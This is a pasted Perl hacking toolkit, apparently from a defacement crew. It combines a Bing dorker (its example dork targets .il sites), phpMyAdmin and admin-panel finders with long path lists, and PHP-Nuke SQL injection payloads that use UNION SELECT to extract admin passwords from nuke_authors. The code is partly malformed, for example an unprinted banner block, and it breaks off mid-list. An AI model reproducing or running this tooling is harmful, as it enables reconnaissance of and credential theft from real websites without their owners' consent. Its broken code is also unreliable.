MultiTools r1z <= 1.0.1 beta

From CrashBandicot, 3 Years ago, written in Perl, viewed 1'057 times.
URL http://paste.security-portal.cz/view/8bc0e827 Embed
Download Paste or View Raw
  1. #!/usr/bin/perl
  2. # Dev by CrashBandicot From TeaM MosTa
  3. # Gr33tz to CoupDeGrace - Saber-Dz  - Ma3str0-Dz - Boualem - xMjhad - Mouadh - k2ll3d - tn_Scorpion - Tn_pirate
  4. use HTTP::Request;
  5. use LWP::UserAgent;
  6. use Digest::MD5;
  7. use MIME::Base64;
  8. use LWP::Simple;
  9. use IO::Socket;
  10. use HTTP::Request::Common;
  11. use Term::ANSIColor;
  12. use Win32::Console::ANSI;
  13. system('cls');
  14. system('title Scanner v1.0 by TeaM MosTa');
  15. print color("green"),"======================================================\n";
  16. print color("green"),"  MultiTools r1z <= 1.0.1 beta   \n";
  17. print color("green"),"    [#] TeaM MosTa [#]      \n";
  18. print color("red"), "   Coded by CrashBandicot                  \n";
  19. print color("green"), "======================================================\n";
  20. print color("green"),"[1] Joomla Scanner\n";
  21. print color("green"),"[2] Md5 Encoder\n";
  22. print color("green"), "[3] PhpMyAdmin finder\n";
  23. print color("green"), "[4] Admin Panel finder\n";
  24. print color("green"), "[5] Base64 Encoder\n";
  25. print color("green"), "[6] Base64 Decoder\n";
  26. print color("green"), "[7] PhpNuke Sql Scanner\n";
  27. print color("green"), "[8] Dorker Bing\n";
  28. print color("green"), "[9] About Us\n\n";
  29. print "[+] Choose Number : ";
  30. my $targett = <>;
  31. chomp $targett;
  32. if($targett eq '8')
  33. {
  34.  system('cls');
  35.  system('color a');
  36.  
  37. +----------------------[Dorker bing]--------------------+
  38. |                                                       |
  39. |                     Edited By TeaM MosTa              |
  40. |                   result in done.txt                  |
  41. +-------------------------------------------------------+
  42.  
  43. };
  44. print "\nDork:";
  45. print "\n(Ex: index.php+site:.il )\n";
  46. print "=>";
  47.  $dork = <STDIN>;
  48.  chomp($dork);
  49.  
  50.  print "Scan Start!";
  51.  
  52.  for ($i = 0; $i < 1000; $i += 10) {
  53.  
  54.  $b = LWP::UserAgent->new(agent => 'Mozilla/4.8 [en] (Windows NT 6.0; U)');
  55.  $b->timeout(30);
  56.  $b->env_proxy;
  57.  $c = $b->get('http://www.bing.com/search?q=' . $dork . '&first=' . $i . '&FORM=PERE')->content;
  58.  $check = index($c, 'sb_pagN');
  59.  
  60.  while (1) {
  61.  $n = index($c, '<h3><a href="');
  62.  
  63.  if ($n == -1) {
  64.  last;
  65.  }
  66.  
  67.  print "$s\n";
  68.  $c = substr($c, $n + 13);
  69.  $s = substr($c, 0, index($c, '"'));
  70.  open (txt,">>done.txt");
  71.  print txt  $s,"\n";
  72.  close(txt);
  73.  
  74.  }
  75.  if ($check == -1) {
  76.  last;
  77.  }
  78.  }
  79.  print "Scan Finished!";
  80.  system("done.txt");
  81.  exit;
  82.  
  83. }
  84. if($targett eq '9')
  85. {
  86.  
  87.         system('cls');
  88.         system('title About Us');
  89.         print "
  90. \t
  91.  
  92. \t :::==== :::===== :::====  :::=======
  93. \t :::==== :::      :::  === ::: === ===
  94. \t  ===   ======   ======== === === ===
  95. \t  ===   ===      ===  === ===     ===
  96. \t  ===   ======== ===  === ===     ===
  97.                                      
  98. \t:::=======  :::====  :::===  :::==== :::====
  99. \t::: === === :::  === :::     :::==== :::  ===
  100. \t=== === === ===  ===  =====    ===   ========
  101. \t===     === ===  ===     ===   ===   ===  ===
  102. \t===     ===  ======  ======    ===   ===  ===
  103.      
  104.  
  105.      \n";
  106.       print "\tT00ls Dev by CrashBandicot\n";
  107.       print "\tFrom TeaM MosTa\n";
  108.       print "\tSpecial Greetz To All Member of Gantengers-Crews\n";
  109.       print "\t[*] Do you want open Gantengers-Crews (y/n) => ";
  110.       my $openit = <>;
  111.       chomp($openit);
  112.       if($openit eq "y")
  113.       {
  114.         system('start http://gantengers-crews.org/');
  115.       }
  116.       else
  117.       {
  118.         print "\t<----TeaM-Mosta---->";
  119.       }
  120.  
  121. }
  122. if($targett eq '2')
  123. {
  124. system('cls');
  125. system('title Md5 Encoder');
  126.                                         {
  127.                                                 print " Md5 Encoder !!!!! \n";
  128.                                         print " Enter Your String:";
  129.                                         $md=<STDIN>;
  130.                                         chomp $md;
  131.                                         print Digest::MD5->md5_hex("$md")
  132.                                         }
  133. }
  134. if($targett eq '3')
  135. { #Script Coded By CrashBandicot (me :)
  136.         system('cls');
  137.         system('title PhpMyAdmin FInder');
  138. @pathh=('/phpMyAdmin/',
  139. '/phpmyadmin/',
  140. '/PMA/',
  141. '/pma/',
  142. '/admin/',
  143. '/dbadmin/',
  144. '/mysql/',
  145. '/myadmin/',
  146. '/phpmyadmin2/',
  147. '/phpMyAdmin2/',
  148. '/phpMyAdmin-2/',
  149. '/php-my-admin/',
  150. '/phpMyAdmin-2.2.3/',
  151. '/phpMyAdmin-2.2.6/',
  152. '/phpMyAdmin-2.5.1/',
  153. '/phpMyAdmin-2.5.4/',
  154. '/phpMyAdmin-2.5.5-rc1/',
  155. '/phpMyAdmin-2.5.5-rc2/',
  156. '/phpMyAdmin-2.5.5/',
  157. '/phpMyAdmin-2.5.5-pl1/',
  158. '/phpMyAdmin-2.5.6-rc1/',
  159. '/phpMyAdmin-2.5.6-rc2/',
  160. '/phpMyAdmin-2.5.6/',
  161. '/phpMyAdmin-2.5.7/',
  162. '/phpMyAdmin-2.5.7-pl1/',
  163. '/phpMyAdmin-2.6.0-alpha/',
  164. '/phpMyAdmin-2.6.0-alpha2/',
  165. '/phpMyAdmin-2.6.0-beta1/',
  166. '/phpMyAdmin-2.6.0-beta2/',
  167. '/phpMyAdmin-2.6.0-rc1/',
  168. '/phpMyAdmin-2.6.0-rc2/',
  169. '/phpMyAdmin-2.6.0-rc3/',
  170. '/phpMyAdmin-2.6.0/',
  171. '/phpMyAdmin-2.6.0-pl1/',
  172. '/phpMyAdmin-2.6.0-pl2/',
  173. '/phpMyAdmin-2.6.0-pl3/',
  174. '/phpMyAdmin-2.6.1-rc1/',
  175. '/phpMyAdmin-2.6.1-rc2/',
  176. '/phpMyAdmin-2.6.1/',
  177. '/phpMyAdmin-2.6.1-pl1/',
  178. '/phpMyAdmin-2.6.1-pl2/',
  179. '/phpMyAdmin-2.6.1-pl3/',
  180. '/phpMyAdmin-2.6.2-rc1/',
  181. '/phpMyAdmin-2.6.2-beta1/',
  182. '/phpMyAdmin-2.6.2-rc1/',
  183. '/phpMyAdmin-2.6.2/',
  184. '/phpMyAdmin-2.6.2-pl1/',
  185. '/phpMyAdmin-2.6.3/',
  186. '/phpMyAdmin-2.6.3-rc1/',
  187. '/phpMyAdmin-2.6.3/',
  188. '/phpMyAdmin-2.6.3-pl1/',
  189. '/phpMyAdmin-2.6.4-rc1/',
  190. '/phpMyAdmin-2.6.4-pl1/',
  191. '/phpMyAdmin-2.6.4-pl2/',
  192. '/phpMyAdmin-2.6.4-pl3/',
  193. '/phpMyAdmin-2.6.4-pl4/',
  194. '/phpMyAdmin-2.6.4/',
  195. '/phpMyAdmin-2.7.0-beta1/',
  196. '/phpMyAdmin-2.7.0-rc1/',
  197. '/phpMyAdmin-2.7.0-pl1/',
  198. '/phpMyAdmin-2.7.0-pl2/',
  199. '/phpMyAdmin-2.7.0/',
  200. '/phpMyAdmin-2.8.0-beta1/',
  201. '/phpMyAdmin-2.8.0-rc1/',
  202. '/phpMyAdmin-2.8.0-rc2/',
  203. '/phpMyAdmin-2.8.0/',
  204. '/phpMyAdmin-2.8.0.1/',
  205. '/phpMyAdmin-2.8.0.2/',
  206. '/phpMyAdmin-2.8.0.3/',
  207. '/phpMyAdmin-2.8.0.4/',
  208. '/phpMyAdmin-2.8.1-rc1/',
  209. '/phpMyAdmin-2.8.1/',
  210. '/phpMyAdmin-2.8.2/',
  211. '/sqlmanager/',
  212. '/mysqlmanager/',
  213. '/p/m/a/',
  214. '/PMA2005/',
  215. '/pma2005/',
  216. '/phpmanager/',
  217. '/php-myadmin/',
  218. '/phpmy-admin/',
  219. '/webadmin/',
  220. '/sqlweb/',
  221. '/websql/',
  222. '/webdb/',
  223. '/mysqladmin/',
  224. '/mysql-admin/',
  225. '/mya/',
  226. );
  227. print "PhpMyAdmin Finder !! :p \n";
  228. print "result in PhpMyadmin.txt \n";
  229. print "Enter Target:";
  230. my $trget = <>;
  231. chomp $trget;
  232. foreach $pathh(@pathh){
  233. my $URLll = $trget.$pathh;
  234. my $Source = get $URLll;
  235. die "Can not get $URLll" unless defined $URLll;
  236. if ($Source =~ /phpMyAdmin/ || /Welcome to phpMyAdmin/ || /Username/ || /Password/) { $Messageee ="PhpMyAdmin P4n3l F!nded";}
  237. else { $Messageee = "P4n3l Not F0und ";}
  238. print "$URLll     =>    $Messageee\n";
  239. print "\n \n \n \n \t \t \t \t FINISH ";
  240. open (TEXT, '>>PhpMyadmin.txt');
  241. print TEXT "\n$URLll   =>   $Messageee \n\n";
  242. close (TEXT);
  243. }
  244.  
  245. }
  246. if($targett eq '4')
  247. { #Script Original Coded By Tartou2
  248. system('cls');
  249. system('title Admin Panel Finder');
  250.         print " Enter Target \n";
  251. print" e.g.: www.target.co.il or www.target.co.il/path\n";
  252. print" --> ";
  253. $site=<STDIN>;
  254. chomp $site;
  255.  
  256. print "\n\n";
  257. print " Enter the coding language of the website \n";
  258. print" e.g.: asp, php, cfm, other\n";
  259. print" If you don't know the launguage used in the coding then simply type ** other ** \n";
  260. print"--> ";
  261. $code=<STDIN>;
  262. chomp($code);
  263.  
  264. if ( $site !~ /^http:/ ) {
  265. $site = 'http://' . $site;
  266. }
  267. if ( $site !~ /\/$/ ) {
  268. $site = $site . '/';
  269. }
  270. print "\n";
  271.  
  272. print "->The website: $site\n";
  273. print "->Source of the website: $code\n";
  274. print "->Scan of the admin control panel is progressing...\n\n\n";
  275.  
  276. if($code eq "asp"){
  277.  
  278. @path1=('_admin/','backoffice/','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
  279. 'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp',
  280. 'admin_area/admin.asp','admin_area/login.asp','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
  281. 'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp',
  282. 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
  283. 'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
  284. 'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
  285. 'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp',
  286. 'administrator/account.asp','administrator.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp',
  287. 'moderator/admin.asp','controlpanel.asp','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
  288. 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.asp','user.html','admincp/index.asp','admincp/login.asp','admincp/index.html',
  289. 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
  290. 'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
  291. 'admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp',
  292. 'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp',
  293. 'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.html',
  294. 'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp',
  295. 'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
  296. 'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.html'
  297. );
  298.  
  299. foreach $ways(@path1){
  300.  
  301. $final=$site.$ways;
  302.  
  303. my $req=HTTP::Request->new(GET=>$final);
  304. my $ua=LWP::UserAgent->new();
  305. $ua->timeout(30);
  306. my $response=$ua->request($req);
  307.  
  308. if($response->content =~ /Username/ ||
  309. $response->content =~ /Password/ ||
  310. $response->content =~ /username/ ||
  311. $response->content =~ /password/ ||
  312. $response->content =~ /USERNAME/ ||
  313. $response->content =~ /PASSWORD/ ||
  314. $response->content =~ /Senha/ ||
  315. $response->content =~ /senha/ ||
  316. $response->content =~ /Personal/ ||
  317. $response->content =~ /Usuario/ ||
  318. $response->content =~ /Clave/ ||
  319. $response->content =~ /Usager/ ||
  320. $response->content =~ /usager/ ||
  321. $response->content =~ /Sing/ ||
  322. $response->content =~ /passe/ ||
  323. $response->content =~ /P\/W/ ||
  324. $response->content =~ /Admin Password/
  325. ){
  326. print " \n [+] Found -> $final\n\n";
  327. print " \n The Login Page Finded \n\n Good Job \n\n";
  328. }else{
  329. print "[-] Not Found <- $final\n";
  330. }
  331. }
  332. }
  333.  
  334.  
  335.  
  336.  
  337.  
  338. # -------------------test cfm ---------------------------|
  339.  
  340.  
  341.  
  342.  
  343.  
  344.  
  345. if($code eq "cfm"){
  346.  
  347. @path1=('_admin/','backoffice/','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
  348. 'memberadmin/','administratorlogin/','adm/','account.cfm','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm',
  349. 'admin_area/admin.cfm','admin_area/login.cfm','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
  350. 'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.cfm','bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm',
  351. 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
  352. 'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
  353. 'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
  354. 'admin/home.cfm','admin/controlpanel.cfm','admin.cfm','pages/admin/admin-login.cfm','admin/admin-login.cfm','admin-login.cfm','admin/cp.cfm','cp.cfm',
  355. 'administrator/account.cfm','administrator.cfm','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/login.cfm','administrator/login.cfm',
  356. 'moderator/admin.cfm','controlpanel.cfm','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
  357. 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.cfm','user.html','admincp/index.cfm','admincp/login.cfm','admincp/index.html',
  358. 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
  359. 'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
  360. 'admincontrol/login.html','adm/index.html','adm.html','admincontrol.cfm','admin/account.cfm','adminpanel.cfm','webadmin.cfm','webadmin/index.cfm',
  361. 'webadmin/admin.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm','panel-administracion/login.cfm','adminLogin.cfm',
  362. 'admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm','adminarea/admin.cfm','adminarea/login.cfm','admin-login.html',
  363. 'panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm','modelsearch/admin.cfm','administrator/index.cfm',
  364. 'admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/index.cfm','adm/index.cfm',
  365. 'adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm','siteadmin/login.cfm','siteadmin/index.cfm','siteadmin/login.html'
  366. );
  367.  
  368. foreach $ways(@path1){
  369.  
  370. $final=$site.$ways;
  371.  
  372. my $req=HTTP::Request->new(GET=>$final);
  373. my $ua=LWP::UserAgent->new();
  374. $ua->timeout(30);
  375. my $response=$ua->request($req);
  376.  
  377. if($response->content =~ /Username/ ||
  378. $response->content =~ /Password/ ||
  379. $response->content =~ /username/ ||
  380. $response->content =~ /password/ ||
  381. $response->content =~ /USERNAME/ ||
  382. $response->content =~ /PASSWORD/ ||
  383. $response->content =~ /Senha/ ||
  384. $response->content =~ /senha/ ||
  385. $response->content =~ /Personal/ ||
  386. $response->content =~ /Usuario/ ||
  387. $response->content =~ /Clave/ ||
  388. $response->content =~ /Usager/ ||
  389. $response->content =~ /usager/ ||
  390. $response->content =~ /Sing/ ||
  391. $response->content =~ /passe/ ||
  392. $response->content =~ /P\/W/ ||
  393. $response->content =~ /Admin Password/
  394. ){
  395. print " \n [+] Found -> $final\n\n";
  396. print " \n The login Page Found \n\n Good Job \n\n";
  397. }else{
  398. print "[-] Not Found <- $final\n";
  399. }
  400. }
  401. }
  402.  
  403.  
  404.  
  405.  
  406.  
  407.  
  408. #--------------------------/test php-------------------------|
  409.  
  410.  
  411.  
  412. if($code eq "php"){
  413.  
  414. @path2=('_admin/','backoffice/','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
  415. 'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php',
  416. 'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
  417. 'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html',
  418. 'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
  419. 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
  420. 'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php',
  421. 'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',
  422. 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php',
  423. 'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
  424. 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html',
  425. 'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',
  426. 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
  427. 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
  428. 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html',
  429. 'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php',
  430. 'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php',
  431. 'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php',
  432. 'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php'
  433. );
  434.  
  435. foreach $ways(@path2){
  436.  
  437. $final=$site.$ways;
  438.  
  439. my $req=HTTP::Request->new(GET=>$final);
  440. my $ua=LWP::UserAgent->new();
  441. $ua->timeout(30);
  442. my $response=$ua->request($req);
  443.  
  444. if($response->content =~ /Username/ ||
  445. $response->content =~ /Password/ ||
  446. $response->content =~ /username/ ||
  447. $response->content =~ /password/ ||
  448. $response->content =~ /USERNAME/ ||
  449. $response->content =~ /PASSWORD/ ||
  450. $response->content =~ /Senha/ ||
  451. $response->content =~ /senha/ ||
  452. $response->content =~ /Personal/ ||
  453. $response->content =~ /Usuario/ ||
  454. $response->content =~ /Clave/ ||
  455. $response->content =~ /Usager/ ||
  456. $response->content =~ /usager/ ||
  457. $response->content =~ /Sing/ ||
  458. $response->content =~ /passe/ ||
  459. $response->content =~ /P\/W/ ||
  460. $response->content =~ /Admin Password/
  461. ){
  462. print " \n [+] Found -> $final\n\n";
  463. print " \n  Login Page Finded \n\n Good :) \n\n";
  464. }else{
  465. print "[-] Not Found <- $final\n";
  466. }
  467. }
  468. }
  469.  
  470.  
  471.  
  472.  
  473.  
  474. # ----------------------- other ---------------------------|
  475.  
  476.  
  477.  
  478.  
  479.  
  480.  
  481. if($code eq "other"){
  482.  
  483. @path1=('_admin/','backoffice/','account.asp','account.cfm','account.html','account.php','acct_login/','adm.asp','adm.cfm','adm.html','adm.php','adm/','adm/admloginuser.asp','adm/admloginuser.cfm','adm/admloginuser.php','adm/index.asp','adm/index.cfm','adm/index.html','adm/index.php','adm_auth.asp','adm_auth.cfm','adm_auth.php','admin.asp','admin.cfm','admin.html','admin.php','admin/','admin/account.asp','admin/account.cfm','admin/account.html','admin/account.php','admin/admin.asp','admin/admin.cfm','admin/admin.html','admin/admin.php','admin/admin_login.asp','admin/admin_login.cfm','admin/admin_login.html','admin/admin_login.php','admin/adminLogin.asp','admin/admin-login.asp','admin/adminLogin.cfm','admin/admin-login.cfm','admin/adminLogin.html','admin/admin-login.html','admin/adminLogin.php','admin/admin-login.php','admin/controlpanel.asp','admin/controlpanel.cfm','admin/controlpanel.html','admin/controlpanel.php','admin/cp.asp','admin/cp.cfm','admin/cp.html','admin/cp.php','admin/home.asp','admin/home.cfm','admin/home.html','admin/home.php','admin/index.asp','admin/index.cfm','admin/index.html','admin/index.php','admin/login.asp','admin/login.cfm','admin/login.html','admin/login.php','admin_area/','admin_area/admin.asp','admin_area/admin.cfm','admin_area/admin.html','admin_area/admin.php','admin_area/index.asp','admin_area/index.cfm','admin_area/index.html','admin_area/index.php','admin_area/login.asp','admin_area/login.cfm','admin_area/login.html','admin_area/login.php','admin_login.asp','admin_login.cfm','admin_login.html','admin_login.php','admin1.asp','admin1.html','admin1.php','admin1/','admin2.asp','admin2.cfm','admin2.html','admin2.php','admin2/index.asp','admin2/index.cfm','admin2/index.php','admin2/login.asp','admin2/login.cfm','admin2/login.php','admin4_account/','admin4_colon/','adminarea/','adminarea/admin.asp','adminarea/admin.cfm','adminarea/admin.html','adminarea/admin.php','adminarea/index.asp','adminarea/index.cfm','adminarea/index.html','adminarea/index.php','adminarea/login.asp','adminarea/login.cfm','adminarea/login.html','adminarea/login.php','admincontrol.asp','admincontrol.cfm','admincontrol.html','admincontrol.php','admincontrol/login.asp','admincontrol/login.cfm','admincontrol/login.html','admincontrol/login.php','admincp/index.asp','admincp/index.cfm','admincp/index.html','admincp/login.asp','admincp/login.cfm','administer/','administr8.asp','administr8.html','administr8.php','administr8/','administratie/','administration.html','administration.php','administration/','administrator.asp','administrator.cfm','administrator.html','administrator.php','administrator/','administrator/account.asp','administrator/account.cfm','administrator/account.html','administrator/account.php','administrator/index.asp','administrator/index.cfm','administrator/index.html','administrator/index.php','administrator/login.asp','administrator/login.cfm','administrator/login.html','administrator/login.php','administratoraccounts/','administratorlogin.asp','administratorlogin.cfm','administratorlogin.php','administratorlogin/','administrators/','administrivia/','adminLogin.asp','admin-login.asp','adminLogin.cfm','admin-login.cfm','adminLogin.html','admin-login.html','adminLogin.php','admin-login.php','adminLogin/','adminpanel.asp','adminpanel.cfm','adminpanel.html','adminpanel.php','adminpro/','admins.asp','admins.html','admins.php','admins/','AdminTools/','admloginuser.asp','admloginuser.cfm','admloginuser.php','affiliate.asp','affiliate.cfm','affiliate.php','autologin/','banneradmin/','bbadmin/','bb-admin/','bb-admin/admin.asp','bb-admin/admin.cfm','bb-admin/admin.html','bb-admin/admin.php','bb-admin/index.asp','bb-admin/index.cfm','bb-admin/index.html','bb-admin/index.php','bb-admin/login.asp','bb-admin/login.cfm','bb-admin/login.html','bb-admin/login.php','bigadmin/','blogindex/','cadmins/','ccp14admin/','cmsadmin/','controlpanel.asp','controlpanel.cfm','controlpanel.html','controlpanel.php','controlpanel/','cp.asp','cp.cfm','cp.html','cp.php','cPanel/','cpanel_file/','customer_login/','database_administration/','directadmin/','dir-login/','ezsqliteadmin/','fileadmin.asp','fileadmin.html','fileadmin.php','fileadmin/','formslogin/','globes_admin/','home.asp','home.cfm','home.html','home.php','hpwebjetadmin/','Indy_admin/','instadmin/','irc-macadmin/','LiveUser_Admin/','login.asp','login.cfm','login.html','login.php','login_db/','login1/','loginflat/','login-redirect/','login-us/','logo_sysadmin/','Lotus_Domino_Admin/','macadmin/','manuallogin/','memberadmin.asp','memberadmin.cfm','memberadmin.php','memberadmin/','members/','memlogin/','meta_login/','modelsearch/admin.asp','modelsearch/admin.cfm','modelsearch/admin.html','modelsearch/admin.php','modelsearch/index.asp','modelsearch/index.cfm','modelsearch/index.html','modelsearch/index.php','modelsearch/login.asp','modelsearch/login.cfm','modelsearch/login.html','modelsearch/login.php','moderator.asp','moderator.cfm','moderator.html','moderator.php','moderator/','moderator/admin.asp','moderator/admin.cfm','moderator/admin.html','moderator/admin.php','moderator/login.asp','moderator/login.cfm','moderator/login.html','moderator/login.php','myadmin/','navSiteAdmin/','newsadmin/','nsw/admin/login.php','openvpnadmin/','pages/admin/admin-login.asp','pages/admin/admin-login.cfm','pages/admin/admin-login.html','pages/admin/admin-login.php','panel/','panel-administracion/','panel-administracion/admin.asp','panel-administracion/admin.cfm','panel-administracion/admin.html','panel-administracion/admin.php','panel-administracion/index.asp','panel-administracion/index.cfm','panel-administracion/index.html','panel-administracion/index.php','panel-administracion/login.asp','panel-administracion/login.cfm','panel-administracion/login.html','panel-administracion/login.php','pgadmin/','phpldapadmin/','phpmyadmin/','phppgadmin/','phpSQLiteAdmin/','platz_login/','power_user/','project-admins/','pureadmin/','radmind/','radmind-1/','rcjakar/admin/login.php','rcLogin/','Server.asp','Server.html','Server.php','server/','server_admin_small/','ServerAdministrator/','showlogin/','simpleLogin/','siteadmin/index.asp','siteadmin/index.cfm','siteadmin/index.php','siteadmin/login.asp','siteadmin/login.cfm','siteadmin/login.html','siteadmin/login.php','smblogin/','sql-admin/','ss_vms_admin_sm/','sshadmin/','staradmin/','sub-login/','Super-Admin/','support_login/','sysadmin.asp','sysadmin.html','sysadmin.php','sysadmin/','sys-admin/','SysAdmin2/','sysadmins/','system_administration/','system-administration/','typo3/','ur-admin.asp','ur-admin.html','ur-admin.php','ur-admin/','user.asp','user.html','user.php','useradmin/','UserLogin/','utility_login/','vadmind/','vmailadmin/','webadmin.asp','webadmin.cfm','webadmin.html','webadmin.php','WebAdmin/','webadmin/admin.asp','webadmin/admin.cfm','webadmin/admin.html','webadmin/admin.php','webadmin/index.asp','webadmin/index.cfm','webadmin/index.html','webadmin/index.php','webadmin/login.asp','webadmin/login.cfm','webadmin/login.html','webadmin/login.php','wizmysqladmin/','wp-admin/','wp-login.php','wp-login/','xlogin/','yonetici.asp','yonetici.html','yonetici.php','yonetim.asp','yonetim.html','yonetim.php','panel/?a=cp'
  484. );
  485.  
  486. foreach $ways(@path1){
  487.  
  488. $final=$site.$ways;
  489.  
  490. my $req=HTTP::Request->new(GET=>$final);
  491. my $ua=LWP::UserAgent->new();
  492. $ua->timeout(30);
  493. my $response=$ua->request($req);
  494.  
  495. if($response->content =~ /Username/ ||
  496. $response->content =~ /Password/ ||
  497. $response->content =~ /username/ ||
  498. $response->content =~ /password/ ||
  499. $response->content =~ /USERNAME/ ||
  500. $response->content =~ /PASSWORD/ ||
  501. $response->content =~ /Senha/ ||
  502. $response->content =~ /senha/ ||
  503. $response->content =~ /Personal/ ||
  504. $response->content =~ /Usuario/ ||
  505. $response->content =~ /Clave/ ||
  506. $response->content =~ /Usager/ ||
  507. $response->content =~ /usager/ ||
  508. $response->content =~ /Sing/ ||
  509. $response->content =~ /passe/ ||
  510. $response->content =~ /P\/W/ ||
  511. $response->content =~ /Admin Password/
  512. ){
  513. print " \n [+] Found -> $final\n\n";
  514. print " \n The Login Page Finded \n\n Good Job \n\n";
  515. }else{
  516. print "[-] Not Found <- $final\n";
  517. }
  518. }
  519. kill("STOP",NULL);
  520. }
  521. }
  522. if($targett eq '')
  523. {
  524. print "Usage: perl MultiTools.pl \n";
  525. exit(1);
  526. }
  527. if($targett eq '7')
  528. {
  529. @Nuke =("modules.php?name=Downloads&d_op=viewdownload&cid=59%20or%20cid=2",
  530.                         "modules.php?name=Reviews&rop=showcontent&id=-1%20UNION%20SELECT%200,0,aid,pwd,email,email,100,pwd,url,url,10000,name%20FROM%20nuke_authors/",
  531.                         "modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20SELECT%200,0,aid,pwd,0%20FROM%20nuke_authors",
  532.                         "modules.php?name=Sections&op=printpage&artid=-1%20UNION%20SELECT%20aid,pwd%20FROM%20nuke_authors",
